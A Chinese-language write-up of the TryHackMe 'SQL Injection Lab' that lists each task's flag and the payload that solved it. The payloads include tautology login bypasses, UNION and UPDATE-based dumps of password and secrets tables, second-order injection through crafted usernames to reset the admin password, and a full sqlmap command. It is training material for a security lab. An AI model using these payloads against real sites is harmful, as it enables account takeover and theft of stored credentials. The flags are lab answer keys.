Tryhackme-SQL Injection Lab
SQL Injection Lab
文章目录
- SQL Injection Lab
- Task1 Introduction
- Task2 Introduction to SQL Injection: Part 1
- Task3 Introduction to SQL Injection: Part 2
- Task4 Vulnerable Startup: Broken Authentication
- Task5 Vulnerable Startup: Broken Authentication 2
- Task6 Vulnerable Startup: Broken Authentication 3 (Blind Injection)
- Task7 Vulnerable Startup: Vulnerable Notes
- Task8 Vulnerable Startup: Change Password
- Task9 Vulnerable Startup: Book Title
- Task10 Vulnerable Startup: Book Title 2
Task1 Introduction
Deploy the machine
Task2 Introduction to SQL Injection: Part 1
1.What is the flag for SQL Injection 1: Input Box Non-String?
THM{dccea429d73d4a6b4f117ac64724f460}
数字型 万能密码登陆
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID=1 or 1=1 -- AND password = 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3'
2.What is the flag for SQL Injection 2: Input Box String?
THM{356e9de6016b9ac34e02df99a5f755ba}
字符型 万能密码登陆
SELECT uid,name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID = '1' or '1'='1' --' AND password = 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3'
3.What is the flag for SQL Injection 3: URL Injection?
THM{645eab5d34f81981f5705de54e8a9c36}
字符型 万能密码登陆,前端限制不允许输入特殊字符,burp截断后编码payload发送
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID='1' or 1=1 --' AND password='6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'
4.What is the flag for SQL Injection 4: POST Injection?
THM{727334fd0f0ea1b836a8d443f09dc8eb}
字符型 万能密码登陆,前端限制不允许输入特殊字符,burp截断后在POST请求体中写入payload
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID = '1' or 1=1--' AND password = '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'
Task3 Introduction to SQL Injection: Part 2
What is the flag for SQL Injection 5: UPDATE Statement?
首先爆出表名为usertable和secrets,
UPDATE usertable SET nickName='',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='',email='123',password='a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3' WHERE UID='6'
爆出列名有id,author,secret
',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='
爆出数据
',nickName=(SELECT group_concat(id || "," || author|| "," || secret|| ":") from secrets),email='
Task4 Vulnerable Startup: Broken Authentication
What is the flag for this challenge?
THM{f35f47dcd9d596f0d3860d14cd4c68ec}
万能密码绕过登陆
1' or 1=1--
Task5 Vulnerable Startup: Broken Authentication 2
What is the flag for this challenge?
THM{fb381dfee71ef9c31b93625ad540c9fa}
万能密码登陆,发现页面右上角存在显示位命令
' UNION SELECT 1,group_concat(password) FROM users-- -
爆出flag
Task6 Vulnerable Startup: Broken Authentication 3 (Blind Injection)
What is the flag for this challenge?
THM{f1f4e0757a09a0b87eeb2f33bca6a5cb}
sqlmap -u http://IP:5000/challenge3/login --data=“username=admin&password=admin” --level=5 --risk=3 --dbms=sqlite -a
Task7 Vulnerable Startup: Vulnerable Notes
What is the flag for this challenge?
THM{4644c7e157fd5498e7e4026c89650814}
二次注入
新建账户名为
'union select 1,group_concat(password) from users'
登陆之后点击Notes,程序执行
SELECT title, note FROM notes WHERE username = ''union select 1,group_concat(password) from users''
语句,爆出所有密码
Task8 Vulnerable Startup: Change Password
What is the flag for this challenge?
二次注入
新建一个名为 admin’-- - 的用户,登陆后更新密码可以更新admin账户的密码
UPDATE users SET password = ? WHERE username = 'admin' -- -'
Task9 Vulnerable Startup: Book Title
What is the flag for this challenge?
THM{27f8f7ce3c05ca8d6553bc5948a89210}
SELECT * from books WHERE id = (SELECT id FROM books WHERE title like '-1') union select 1,2,3,group_concat(password) from users-- -%')
Task10 Vulnerable Startup: Book Title 2
What is the flag for this challenge?
THM{183526c1843c09809695a9979a672f09}
Tryhackme-SQL Injection Lab相关推荐
- 从入门到入土:[SEED-Lab]-SQL注入攻击|SQL Injection Attack Lab|详细说明|实验步骤|实验截图
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益.不合适引用,自当删除! 若 ...
- Lab: Blind SQL injection with conditional responses PRACTITIONER 带条件响应的SQL盲注靶场复盘
靶场完成目标: This lab contains a blind SQL injection vulnerability. The application uses a tracking cooki ...
- 【PortSwiggerのWeb Security Academy靶场】SQL Injection系列 9th
Subject Lab: Blind SQL injection with conditional responses Url: portswigger.net/web-securit- Mind P ...
- ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过 ...
- druid sql黑名单 报异常 sql injection violation, part alway true condition not allow
最近使用druid,发现阿里这个连接池 真的很好用,可以监控到连接池活跃连接数 开辟到多少个连接数 关闭了多少个,对于我在项目中查看错误 问题,很有帮助, 但是最近发现里面 有条sql语句 被拦截了, ...
- 网络***技术开篇——SQL Injection
http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,国内最大的程序员社区CSDN网站的用户数据库被***公开 ...
- 【Web安全】关于SQL Injection和盲注的探索(DVWA)
文章目录 1 SQL Injection 1.1 解释 1.2 手工注入思路 1.3 low 2 SQL Injection (Blind) 2.1 SQL盲注与普通的SQL注入区别 2.2 low ...
- SQL Injection(SQL注入)介绍及SQL Injection攻击检测工具
1.关于SQL Injection 迄今为止,我基本没有看到谁写出一篇很完整的文章,或者说很成熟的解决方案(能做到 的人肯定很多,问题是没有流传开来,很遗憾) 我简单的说几点,希望启发大家思考,起到抛 ...
- DVWA学习(二)SQL Injection(Blind)
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是 ...
最新文章
- 【Oracle RAC+DG实验】Oracle RAC+ASM+DataGuard配置实验记录+常见问题
- mybatis新增时将主键值返回(注解方式)
- 交叉编译和交叉调试环境的搭建及使用
- win7建立wifi热点
- CodeForces - 1370E Binary Subsequence Rotation(思维)
- 获得磁盘的C++描述信息
- Java的简单了解。
- java非侵入式接口实现,C++编写非侵入式接口
- 《Algorithms》Comparable 实现插入排序
- AI 女性界的“扛把子”,凭一己之力迫使 NIPS 改名
- 深入解析ORACLE字符集
- 区块链产品经理规范与总结
- 网络舆情分析系统具体使用功能及作用详解
- 二自由度云台扫描算法_基于二维压电透射式微扫描器的红外超分辨率成像|压电扫描台...
- android体脂代码,该减肥了吗?教你用手机App测量体脂率
- 向量叉积和点积混合运算_matlab中的向量的数量积和向量积
- 计算机组成原理SRop,【9A文】计算机组成原理历年真题.docx
- 学生选课信息管理系统(可行性分析报告)
- 内网渗透-window权限维持
- 【计算机网络面试高频】-HTTP协议详解,HTTP协议常见问题
热门文章
- 使用IDEA的Redis插件连接Redis服务器
- SSB配置异常引起的问题
- 2020京东618叠蛋糕一键做任务程序PC端
- 如何解决cmd命令无法转到D盘的路径的问题
- 35.文本输出函数TabbedTextOut、ExtTextOut、TextOut、SetBkColor
- 计算机管理进行分区,如何硬盘分区_怎么硬盘分区-win7之家
- 精读鸟哥linux私房菜-笔记介绍
- saiku 连接 MySQL_saiku迁移至mysql步骤
- Programming Assignment 4: 8 puzzle
- session 重放攻击_关于接口的重放攻击